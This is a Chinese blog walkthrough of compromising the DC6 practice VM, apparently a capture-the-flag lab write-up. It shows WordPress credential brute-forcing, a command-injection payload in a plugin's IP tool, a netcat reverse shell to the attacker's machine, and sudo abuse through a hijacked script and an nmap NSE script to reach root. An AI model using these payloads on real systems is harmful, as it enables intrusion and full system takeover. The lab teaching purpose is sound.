当前位置: 首页 > news >正文

DC6靶机的渗透测试与复盘

1.环境准备

下载DC6靶机,导入VM,然后设置为NAT模式,kali也设置为NAT模式。

2.信息收集

扫描同网段下的ip,找到192.168.204.147为DC6靶机的ip

利用nmap扫描靶机ip得到开放了80端口和22端口

访问该网页,发现无法访问,但是网址变成了wordy(根据DC6的作者提示,需要设置hosts文件,加上格式为ip wordy)

编辑hosts文件,加上192.168.204.147 wordy

再次访问,发现成功进入主页面(发现没有什么关键信息)

于是利用dirsearch扫描网页目录,发现有一个wp-login,很可能是后台登录页面

访问以后发现确实是,不过我们没有用户名和密码

3.漏洞挖掘

wpscan --url http://wordy/ -e u 用wpscan工具扫描网站用户名,发现有五个用户名,将五个用户名放入user.txt中。根据官网的提示,cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt,将密码词典中带有k01的密码放入passwords.txt中,这样能够减少我们很多时间。

wpscan --url http://wordy -U /home/kali/Desktop/user.txt -P /home/kali/Desktop/password.txt(用户名和密码都被我放到了桌面,用这段指令指定用户名和密码,进行爆破,成功爆破出mark的密码)

利用mark的账号密码进行登录,可以在users中发现每个用户的权限信息。不过对我们作用并不是特别大,我们得看有没有别的可利用的。

在Activity monitor中,我们发现有一个IP tools可以将ip地址转换。(或许这是一种前台输入,后台执行命令的输入框呢)

前端输入框有长度限制,通过浏览器F12修改 maxlength 属性,突破长度限制,拼接执行系统命令。192.168.204.147&cat /etc/passwd

点击第一个按钮并不会出现结果,但是点击第二个按钮lookup发现成功读取到了,说明命令成功。那么就可以用这个方法进行反弹shell

4.漏洞利用

kali终端进行监听4444端口,等待DC6的连接

输入框中填入:192.168.204.147 & nc 192.168.204.128 4444 -e /bin/bash 用 & 拼接命令,实现后台执行反弹shell。接着利用python -c "import pty;pty.spawn('/bin/bash')"将shell切换为交互式。

查看该用户可以用sudo权限执行的命令,发现没有

5.进行提权

在 /home/mark 目录下发现敏感文件,从中获取graham用户的密码

使用 su graham 切换用户。

查询该用户可以用sudo权限执行的命令,发现有一个,可以无密码执行jens用户的特定的脚本,既然如此,我们或许可以给这个脚本动动手脚。

/bin/bash放入该脚本中,在执行以后,能够得到jens用户的shell

以jens用户的身份执行该脚本,发现成功得到了jens用户的shell

梅开二度,继续看当前用户有哪些sudo权限指令可以执行,发现可以以root身份无密码执行nmap命令

在tmp文件夹中,创建一个shell.nse脚本,echo 'os.execute("/bin/bash")' > /tmp/shell.nse用这个指令写入脚本

sudo nmap --script=/tmp/shell.nse执行nmap的命令,发现成功执行,并且得到了root,提权成功!

6.渗透复盘

1. 信息收集 → 发现 80 端口 WordPress

2. 修改 hosts 绑定域名,正常访问网站

3. wpscan 枚举用户 + 过滤密码字典爆破

4. 后台 IP 工具存在命令执行,反弹shell

5. 提权链:

网页 → 拿到 WordPress 后台账号:mark

后台 IP 工具命令执行 → 拿到 www-data 权限的 shell

在 /home/mark 下发现密码 → 切换为系统用户 graham

graham 利用 sudo 劫持脚本 → 拿到 jens

jens 利用 sudo nmap 脚本提权 → 拿到 root

6. 拿下 root,获取 flag,通关完结

http://www.cnnetsun.cn/news/2051897.html

相关文章:

  • 终极指南:HTTrack网站镜像工具完整使用教程
  • 把远端数据当本地数据来查, 读懂 SAP HANA 里的 Federating Queries
  • FlicFlac音频转换工具:5个关键特性解析与技术实现
  • VSCode 2026工业编程配置必须做的7件事,第4件92%工程师至今忽略——否则无法通过IEC 62443安全审计
  • 从AK4490到ES9038:聊聊那些年我们用过的DAC芯片,以及它们背后的声音故事
  • 别再傻傻分不清了!Modbus RTU、TCP、RTU over TCP/IP 三兄弟到底啥区别?用Java代码实战给你讲明白
  • 西门子WinCC报表实战:手把手教你用用户归档+SQL Server实现数据查询与打印(附避坑指南)
  • 2026年转行AI产品经理,0基础小白必看!高薪风口,你准备好了吗?
  • 深度解析开源工具:如何高效实现《赛博朋克2077》存档编辑与数据修改
  • BBS短群签名方案:从q-SDH假设到可追踪匿名认证
  • Linux 进阶命令实战:sudo 授权、文件查找、文本处理与进程管理
  • Qt串口通信GUI卡顿?试试把QSerialPort丢到子线程里(附完整代码)
  • 从外网打到内网:手把手教你用MSF+Socks代理穿透CFS三层靶机网络
  • 生成引擎优化(GEO)提升数字内容互动与用户体验的新策略
  • 保姆级教程:在Ubuntu 22.04上搞定ROS2 Humble与速腾16线雷达的驱动配置
  • 策略模式的思想的经典案例分析
  • Vivado BD 地址位宽校验失败深度解析:从 [IP_Flow 19-3478] 错误到 AXI 总线对齐原则
  • Jellyfin Kodi插件终极指南:打造无缝跨设备媒体体验
  • 撕下“被动应答”的伪装:清华等团队开源 PASK,AI 终于长出了“眼力见”与“长期记忆”!
  • Star 11.5k 开源的网络钓鱼平台 gophish
  • 从《原神》到Matlab:我是如何用TheColor工具箱自制一套67角色配色包的(附源码思路)
  • 开源神器Serial Studio实战:如何用它的CSV导出和网络功能,做自动化测试报告?
  • CodeCombat游戏化编程学习终极指南:用游戏思维掌握代码技能
  • Docker 27安全扫描零配置接入,5分钟完成SBOM生成+OSV漏洞匹配+自动阻断策略部署
  • 3步彻底清理Mac残留文件:Pearcleaner让你的Mac重获新生
  • Codeforces胡萝卜插件:终极实时评级预测指南
  • 从传感器到屏幕:用STM32的ADC读取电子秤数据并显示(野火指南者实战)
  • 光子量子神经网络架构与混合计算框架解析
  • 从零到精通:大模型完整学习路线(避坑指南+实战变现)
  • VisionMaster 4.2 SDK避坑指南:C#二次开发中那些官方文档没细说的‘坑’